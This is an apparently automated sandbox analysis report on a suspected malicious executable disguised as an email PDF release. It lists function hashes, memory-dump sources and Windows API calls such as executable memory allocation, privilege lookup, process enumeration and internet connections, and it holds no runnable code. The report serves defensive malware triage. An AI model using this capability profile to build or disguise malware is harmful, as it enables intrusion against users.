• Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
Similarity
• API ID: MessageSend
• String ID: msctls_trackbar32
• API String ID: 3850602802-1010561917
• Opcode ID: 88cbf0faf7aaffd819631653ae6e90e84ed088b5b80f61cec5fff65b3142c1e9
• Instruction ID: 21a41d6de7ff64be6bef9283b516532713a3c16663edf0299a498cdda1f87957
• Opcode Fuzzy Hash: 88cbf0faf7aaffd819631653ae6e90e84ed088b5b80f61cec5fff65b3142c1e9
• Instruction Fuzzy Hash: FA11E372244208BEEF245F65CC05FEB77B9EF88B64F114529FA45A61E0D676E811CB20
APIs
• GetSystemDirectoryW.KERNEL32(?), ref: 00791775
  • Part of subcall function 007CBFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,0079195E,?), ref: 007CBFFE
  • Part of subcall function 007CBFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 007CC010
• FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0079196D
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
Similarity
• API ID: Library$AddressDirectoryFreeLoadProcSystem
• String ID: Pm$WIN_XPe
• API String ID: 582185067-3764392556
• Opcode ID: 2e9e16f3c8c2ab3e582e6bb62c5866ef47325d6ddb4ecb69c034967f4f7d0add
• Instruction ID: e98b310804e7d52096a68da5e4e344e10771714d1ca8bdfef7445efffbfb90be
• Opcode Fuzzy Hash: 2e9e16f3c8c2ab3e582e6bb62c5866ef47325d6ddb4ecb69c034967f4f7d0add
• Instruction Fuzzy Hash: 33F0C97080110ADFDF15DB91D988BECBBF8BB08301F94409AE102A2190D7799F94DF64
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,00754B83,?), ref: 00754C44
• GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00754C56
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: Wow64RevertWow64FsRedirection$kernel32.dll
• API String ID: 2574300362-1355242751
• Opcode ID: 6ee794d2a0f375b60bf30cef2978acfeddb16c7f4af249b49b88d4d4c90aadac
• Instruction ID: 86df473c0216d21799f313c8e7a0f1755d431bf7435254bb140a5dea5c5a45fe
• Opcode Fuzzy Hash: 6ee794d2a0f375b60bf30cef2978acfeddb16c7f4af249b49b88d4d4c90aadac
• Instruction Fuzzy Hash: 06D0C770502B13CFC7208F31CD0829A73E5AF00346B10C83BD8A2C62A8E7B8C8C0CA20
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,00754BD0,?,00754DEF,?,,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00754C11
• GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00754C23
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: Wow64DisableWow64FsRedirection$kernel32.dll
• API String ID: 2574300362-3689287502
• Opcode ID: c7f02c30bf02e6e5bfdd2cf369d54aab7888ef743bcb5f66755a9a412967ef7d
• Instruction ID: 194583b4f3b5801daaf861ff3936213204411d44d0503da92112b399aad43a8f
• Opcode Fuzzy Hash: c7f02c30bf02e6e5bfdd2cf369d54aab7888ef743bcb5f66755a9a412967ef7d
• Instruction Fuzzy Hash: 4ED0E270512B13CFD720AB71D908646BAF6EF09356B15C83AD896D62A0E6B9D8808A60
APIs
• LoadLibraryA.KERNEL32(advapi32.dll,?,007D1039), ref: 007D0DF5
• GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 007D0E07
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: RegDeleteKeyExW$advapi32.dll
• API String ID: 2574300362-4033151799
• Opcode ID: 157c080b551976348fca220e9c2d12b81ce141c931081c0854c6205152ac6c28
• Instruction ID: 5beb785640d72db39dbd0a9fd2bc3e1293da6032009a9210a7ba82d4a2a6b638
• Opcode Fuzzy Hash: 157c080b551976348fca220e9c2d12b81ce141c931081c0854c6205152ac6c28
• Instruction Fuzzy Hash: 70D08230400326CFD320AF72CC0828A73E9AF00352F00CC2ED4A2C2290E6B9D8908AA4
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,00000001,007C8CF4,?,007DF910), ref: 007C90EE
• GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 007C9100
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: GetModuleHandleExW$kernel32.dll
• API String ID: 2574300362-199464113
• Opcode ID: cbd2da4b079c3f0bc9babc20c909ef9b3ead7db51413c8360b375068b74aeb79
• Instruction ID: a33bf7a489aafe8e16aff2fce5df26f710613522fc926f80f1a4b3a22ce8adff
• Opcode Fuzzy Hash: cbd2da4b079c3f0bc9babc20c909ef9b3ead7db51413c8360b375068b74aeb79
• Instruction Fuzzy Hash: DFD0C770510717CFCB608F30C80DA0273E6AF00381B2AC83FD492C2290EB78C880CAA0
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
Similarity
• API ID: LocalTime__swprintf
• String ID: %.3d$WIN_XPe
• API String ID: 2070861257-2409531811
• Opcode ID: b709a6d2ef297dfac61365e40985c03b5dda80ea147a13b67788fbdb90168e43
• Instruction ID: e080e2478e9e0ef54f93585da4c3e435faff0e0bbc0fd160af1ae3894822d885
• Opcode Fuzzy Hash: b709a6d2ef297dfac61365e40985c03b5dda80ea147a13b67788fbdb90168e43
• Instruction Fuzzy Hash: BDD0127180510BEACF0096D0AC888F9737CB708701F9044A2F506D2180E26D9764E721
Memory Dump Source
• Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 93c0ae50e357456ed23d5767d38b35d594f06d394f1355a14de9f62d7d5ce26a
• Instruction ID: 57de548e0c586197881b5999cd45e0d19978f54f6b91c8243a6a47146a48b71b
• Opcode Fuzzy Hash: 93c0ae50e357456ed23d5767d38b35d594f06d394f1355a14de9f62d7d5ce26a
• Instruction Fuzzy Hash: 7DC16D75A04216EFCB18CFA4C884EAEBBB5FF89314B158698F805DB251D734ED81DB90
APIs
• CharLowerBuffW.USER32(?,?), ref: 007CE0BE
• CharLowerBuffW.USER32(?,?), ref: 007CE101
  • Part of subcall function 007CD7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 007CD7C5
• VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 007CE301
• _memmove.LIBCMT ref: 007CE314
Memory Dump Source
• Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
Similarity
• API ID: BuffCharLower$AllocVirtual_memmove
• String ID:
• API String ID: 3659485706-0
• Opcode ID: ee0623772a6a18aab2b48f3525de00d6ec8ef12d80e280b1119ff9eae01bc9a0
• Instruction ID: 4888563ce1fffdb754f9e7af8b7d93bea031c84cbce18b70d719030c8d708773
• Opcode Fuzzy Hash: ee0623772a6a18aab2b48f3525de00d6ec8ef12d80e280b1119ff9eae01bc9a0
• Instruction Fuzzy Hash: C4C16771A08301DFC714DF28C484A6ABBE4FF89314F14896EF8999B351D778E946CB82
APIs
• CoInitialize.OLE32(00000000), ref: 007C80C3
• CoUninitialize.OLE32 ref: 007C80CE
  • Part of subcall function 007AD56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 007AD5D4
• VariantInit.OLEAUT32(?), ref: 007C80D9
• VariantClear.OLEAUT32(?), ref: 007C83AA
Memory Dump Source
• Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
Similarity
• API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
• String ID:
• API String ID: 780911581-0
• Opcode ID: 951562618e8f690088185ac11ea2859d07ae7e3d5db11f3291746dd5bf6c0e34
• Instruction ID: f17f2253995128419a89acb1b921fbda3b435c084c9df579e7478175348bdb67
• Opcode Fuzzy Hash: 951562618e8f690088185ac11ea2859d07ae7e3d5db11f3291746dd5bf6c0e34
• Instruction Fuzzy Hash: 33A11475604B05DFCB50DF54C889B6AB7E4BF89314F18841DEA969B3A1CB78ED04CB82
APIs
Memory Dump Source
• Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
Similarity
• API ID: Variant$AllocClearCopyInitString
• String ID:
• API String ID: 2808897238-0
• Opcode ID: 051c4aa161df5b0e7cd9289ce3365417297c6a380d18d3d09c3f0b5cf21d7006
• Instruction ID: 843bf230b3b4e453811aa33665b3cee7ee8e399a28f3c4dfe7b06d4d1a209276
• Opcode Fuzzy Hash: 051c4aa161df5b0e7cd9289ce3365417297c6a380d18d3d09c3f0b5cf21d7006
• Instruction Fuzzy Hash: 3B51F374704301DEDF24AF65C895A7AB3E5AF96310F28C91FE58AEB291DB7CD8808741
APIs
• GetWindowRect.USER32(00E5DEC8,?), ref: 007D9863
• ScreenToClient.USER32(00000002,00000002), ref: 007D9896
• MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 007D9903
Memory Dump Source
• Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
Similarity
• API ID: Window$ClientMoveRectScreen
• String ID:
• API String ID: 3880355969-0
• Opcode ID: 45c7a4af1a68e863cdb223b078cb2b046f4808a545df7c718811ba782adbf946
• Instruction ID: 509dbe659ac04e7baf30544d212f6c9173820605b71c500827f17b66cd95b771
• Opcode Fuzzy Hash: 45c7a4af1a68e863cdb223b078cb2b046f4808a545df7c718811ba782adbf946
• Instruction Fuzzy Hash: F2512E34A00209EFCB10CF58C894AAE7BB5FF95760F14816AF9559B3A0D735ED81DB90
APIs
• SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 007A9AD2
• __itow.LIBCMT ref: 007A9B03
  • Part of subcall function 007A9D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 007A9DBE
• SendMessageW.USER32(?,0000110A,00000001,?), ref: 007A9B6C
• __itow.LIBCMT ref: 007A9BC3
Memory Dump Source
• Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
Similarity
• API ID: MessageSend$__itow
• String ID:
• API String ID: 3379773720-0
• Opcode ID: 34ee849c6ef4c93103d87e1b59988f9760e28673a804806e4f6b975d9e09f9e5
• Instruction ID: 29e6a2de9631801563470e08dbe7785c7bdae88f18a67b6b00865cdf3900e3bb
• Opcode Fuzzy Hash: 34ee849c6ef4c93103d87e1b59988f9760e28673a804806e4f6b975d9e09f9e5
• Instruction Fuzzy Hash: 3B4183B0A00208EBDF15DF54D849BFE7BB9EF85711F004059FE05A7291DB789958CBA1
APIs
• socket.WSOCK32(00000002,00000002,00000011), ref: 007C69D1
• WSAGetLastError.WSOCK32(00000000), ref: 007C69E1
  • Part of subcall function 00759837: __itow.LIBCMT ref: 00759862
  • Part of subcall function 00759837: __swprintf.LIBCMT ref: 007598AC
• #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 007C6A45
• WSAGetLastError.WSOCK32(00000000), ref: 007C6A51
Memory Dump Source
• Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
Similarity
• API ID: ErrorLast$__itow__swprintfsocket
• String ID:
• API String ID: 2214342067-0
• Opcode ID: d800ed53a8dd3e2c253a62033947e18369c992ea5891ac003aeea9c7853d85f1
• Instruction ID: 22f0ae3cac96135e71e478c015ffe8215f5dd267e79f80db99ac6e3e5a0d0861
• Opcode Fuzzy Hash: d800ed53a8dd3e2c253a62033947e18369c992ea5891ac003aeea9c7853d85f1
• Instruction Fuzzy Hash: 30419275740200EFEB50AF24CC8AF6A77E49B04B14F04C45CFE19AF2D2DAB89D048B55
APIs
• #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,007DF910), ref: 007C64A7
• _strlen.LIBCMT ref: 007C64D9
Memory Dump Source
• Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
Similarity
• API ID: _strlen
• String ID:
• API String ID: 4218353326-0
• Opcode ID: 88662cfa1310528a91029b71c35662212940bcdd0f35ef34c66349fe798c9335
• Instruction ID: 8f373e46f5c59f684c2057c22c0f1845b72b8eade3303dd27a6b3ef52d5c9b88
• Opcode Fuzzy Hash: 88662cfa1310528a91029b71c35662212940bcdd0f35ef34c66349fe798c9335
• Instruction Fuzzy Hash: F3419871500104EBCB14EB64ECD9FEEB7A9AF44310F24815DF91A97296DB78AD14CB50
APIs
• CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 007BB89E
• GetLastError.KERNEL32(?,00000000), ref: 007BB8C4
• DeleteFileW.KERNEL32(00000002,?,00000000), ref: 007BB8E9
• CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 007BB915
Memory Dump Source
• Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
APIs
• InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 007D88DE
Memory Dump Source
• Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
APIs
• ClientToScreen.USER32(?,?), ref: 007DAB60
• GetWindowRect.USER32(?,?), ref: 007DABD6
• PtInRect.USER32(?,?,007DC014), ref: 007DABE6
• MessageBeep.USER32(00000000), ref: 007DAC57
Memory Dump Source
• Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
APIs
• _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 007861FB
• __isleadbyte_l.LIBCMT ref: 00786229
• MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00786257
• MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0078628D
Memory Dump Source
• Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
APIs
• GetForegroundWindow.USER32 ref: 007D4F02
  • Part of subcall function 007B3641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 007B365B
  • Part of subcall function 007B3641: GetCurrentThreadId.KERNEL32 ref: 007B3662
  • Part of subcall function 007B3641: AttachThreadInput.USER32(00000000,?,007B5005), ref: 007B3669
• GetCaretPos.USER32(?), ref: 007D4F13
• ClientToScreen.USER32(00000000,?), ref: 007D4F4E
• GetForegroundWindow.USER32 ref: 007D4F54
Memory Dump Source
• Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 007B3C7A
• Process32FirstW.KERNEL32(00000000,?), ref: 007B3C88
• Process32NextW.KERNEL32(00000000,?), ref: 007B3CA8
• CloseHandle.KERNEL32(00000000), ref: 007B3D52
Memory Dump Source
• Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
APIs
  • Part of subcall function 00752612: GetWindowLongW.USER32(?,000000EB), ref: 00752623
• GetCursorPos.USER32(?), ref: 007DC4D2
• TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0078B9AB,?,?,?,?,?), ref: 007DC4E7
• GetCursorPos.USER32(?), ref: 007DC534
• DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0078B9AB,?,?,?), ref: 007DC56E
Memory Dump Source
• Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
APIs
  • Part of subcall function 007A810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 007A8121
  • Part of subcall function 007A810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 007A812B
  • Part of subcall function 007A810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 007A813A
  • Part of subcall function 007A810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 007A8141
  • Part of subcall function 007A810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 007A8157
• LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 007A86A3
• _memcmp.LIBCMT ref: 007A86C6
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 007A86FC
• HeapFree.KERNEL32(00000000), ref: 007A8703
Memory Dump Source
• Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
APIs
• __setmode.LIBCMT ref: 007709AE
  • Part of subcall function 00755A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,007B7896,?,?,00000000), ref: 00755A2C
  • Part of subcall function 00755A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,007B7896,?,?,00000000,?,?), ref: 00755A50
• _fprintf.LIBCMT ref: 007709E5
• OutputDebugStringW.KERNEL32(?), ref: 007A5DBB
  • Part of subcall function 00774AAA: _flsall.LIBCMT ref: 00774AC3
• __setmode.LIBCMT ref: 00770A1A
Memory Dump Source
• Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
Similarity
• API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
• String ID:
• API String ID: 521402451-0
• Opcode ID: 94da5f355b693eda6448803c93a990a904e56c9445a7d4d959d38966d357269f
• Instruction ID: 1c00f58d17bbbc7571d6158c488935b5eeb873527476474009741bb8e9f8abf3
• Opcode Fuzzy Hash: 94da5f355b693eda6448803c93a990a904e56c9445a7d4d959d38966d357269f
• Instruction Fuzzy Hash: F3115732604208EFCF04B3B49C4E9FE77A8AF81360F14C155F20853182EF6C584687E5
APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 007C17A3
  • Part of subcall function 007C182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 007C184C
  • Part of subcall function 007C182D: InternetCloseHandle.WININET(00000000), ref: 007C18E9
Memory Dump Source
• Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
Similarity
• API ID: Internet$CloseConnectHandleOpen
• String ID:
• API String ID: 1463438336-0
• Opcode ID: 5b2f448c5e6f2fce67a127b17e10655644abf39a0430c52b0af842e4bf44e176
• Instruction ID: b6e201843021189f7e090f68ac577278fa3616926fbfab92609f28cab35e35d7
• Opcode Fuzzy Hash: 5b2f448c5e6f2fce67a127b17e10655644abf39a0430c52b0af842e4bf44e176
• Instruction Fuzzy Hash: D121F331204601BFEB129F60CC00FBABBE9FF4A720F54403EFA0596652DB79D811A7A0
APIs
• GetFileAttributesW.KERNEL32(?,007DFAC0), ref: 007B3A64
• GetLastError.KERNEL32 ref: 007B3A73
• CreateDirectoryW.KERNEL32(?,00000000), ref: 007B3A82
